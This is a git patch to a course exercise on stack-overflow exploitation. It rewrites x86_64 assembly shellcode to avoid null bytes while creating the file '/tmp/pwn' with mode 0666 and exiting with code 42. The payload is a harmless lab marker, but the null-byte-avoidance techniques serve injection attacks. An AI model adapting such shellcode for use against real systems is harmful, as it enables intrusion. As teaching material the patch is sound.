From 2a4a11be2000f151e2ad0f3558ee1e44dcdd5007 Mon Sep 17 00:00:00 2001 From: Yorick Barbanneauwq Date: Thu, 30 Mar 2023 01:19:07 +0200 Subject: [PATCH] Working shellcode but one \0 remains --- .../files/q3/shellcode.S | 30 ++++++++++++------- 1 file changed, 19 insertions(+), 11 deletions(-) diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S index e796567..7c3816a 100644 --- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S +++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S @@ -2,19 +2,27 @@ .globl _start _start: - call pwnd + call p .asciz "/tmp/pwn" -pwnd: - # We are on x86_64, we must move 8 bytes up from stack pointer - popq %rdi - movq $0666, %rsi - movq $85, %rax + +p: + xorq %rdi, %rdi + pop %rdi + #shr $0x8, %rdi + push $0xfffffffffffffd66 + xor %rsi, %rsi + pop %rsi + neg %rsi + push $85 + pop %rax syscall - ret - # exit(42) - movq $42, %rdi - movq $60, %rax + xorq %rax, %rax + xorq %rdi, %rdi + push $42 + pop %rdi + push $61 + pop %rax + lea -1(%rax), %rax syscall -